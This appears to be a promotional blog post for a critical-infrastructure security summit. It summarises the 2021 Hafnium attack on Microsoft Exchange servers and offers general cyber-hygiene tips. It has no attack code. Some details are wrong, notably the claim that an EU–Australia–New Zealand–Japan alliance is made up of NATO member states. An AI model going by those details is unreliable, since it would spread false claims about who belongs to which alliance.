The European Union, Australia, New Zealand, and Japan have come together as a newly launched cybersecurity alliance to confront the global threat posed by Chinese state-sponsored cyberattacks. The alliance has come out publicly accusing China of the recent Microsoft Exchange servers attack that had a massive impact across continents.
Hafnium hacker, as Microsoft identified the group behind the hack, is a relatively unknown Chinese espionage network. They are a state-sponsored advanced persistent threat (APT) group that tried to conceal their identity by operating from leased virtual private servers (VPS) located in the US. Velocity believes that the attacks appear to have started as early as January 6, 2021. They claim that the attacker was exploiting a zero-day server-side request forgery (SSRF) vulnerability in Microsoft Exchange (CVE-2021-26855).
Acknowledging that the nation-state actors or groups will move quickly to take advantage of any unpatched systems, Microsoft did quickly deploy an update for the Hafnium exploits and has been urging customers to apply the updates as soon as possible due to the critical rating of the flaws. They believe, “Promptly applying today’s patches is the best protection against this attack,”
Additionally, Microsoft is updating Exchange Server 2010 for “defense-in-depth purposes” along with sharing detailed guidance on how the malicious actors are exploiting these vulnerabilities and targeting customers, and educating Exchange administrators on what steps to take to secure their Exchange environments.
On how the attack conspired, Cybersecurity researchers at Microsoft said that the attackers secured access to an Exchange Server either through the bugs or stolen credentials and then created a web shell to hijack the system and execute commands remotely. Web shells are small scripts that provide a basic interface for remote access to a compromised system.
Being at high risk of vulnerability, web shells are increasingly more common in attacks, both commodity and targeted. It is essential to continue to monitor and investigate such cyberattack trends and ensure the protection of customers. Digital transformation has transitioned us towards a digital economy and made it potentially ripe for cyberattacks, now more than ever. Microsoft reported that it had seen twice as many web shell attacks between August 2020 and January 2021 than in the same period last year.
The alliance made up of NATO member states is a role model for confronting such transnational threats that are increasing exponentially. From global companies to government organizations, it’s time to make well-informed cybersecurity choices and designing future systems that we can trust. Especially for the critical infrastructure industries having to adopt new technologies, organizations are now exposed to a host of new cyber threats. Though the increasing connectedness of IT and operational physical processes improve productivity, they also expose them to security risks we are ill-prepared to combat.
Many manufacturers are adopting the zero-trust security approach for critical industrial control system (ICS) environments to mitigate risk and bolster protection measures as an extra compliant step. The approach aims to verify an ongoing trust in people, devices, systems, and networks before engaging with them and ensure nothing is compromised.
Security firm Armis conducted a survey across the US with over 2,000 respondents and found that end users are not paying attention to the major cybersecurity attacks plaguing operational technology (OT) and critical infrastructure across the country. As we progress towards a more independent and digital system, we cannot leave behind the OT administrators. We need to make sure they understand what security controls will bring into the environment and how they will make their lives better. Security cannot move forward without taking the people along.
The Microsoft incident and others like the Kaseya attack should itself be a warning sign to keep your servers up to date and get the systems and people prepared against future cyberattacks. Here’s how you can begin your cybersecurity journey.
Quick Tips
- Educate your customers and employees about cyber hygiene and system updates along the way. Training is the key.
- Develop enterprise risk management policies tied up with cybersecurity.
- Prioritize robust network and host-based monitoring solutions.
- Implement backups based on business value and operational needs and look out for failures and inconsistencies.
- Conduct a thorough assessment of your company’s current IT environment and security controls.
- Mandate regular audits of access to systems and networks.
- Upload your security patches, complex passwords, multifactor authentication, back up your data.
- Be prepared for cyberattacks with law enforcement and security experts at your corner and meanwhile developing and testing recovery plans regularly.
- Make sure the team works together rather than in silos.
Want to learn more about how you can help your employees build critical cybersecurity skills? Join the Cyber Security for Critical Assets Summit Europe as it brings together 100’s of IT & OT security leaders from the Energy, Oil and Gas industries.
Take a look at our Agenda and book your seat for FREE for 12th & 13th October 2021 with the Discount code: MYVIP
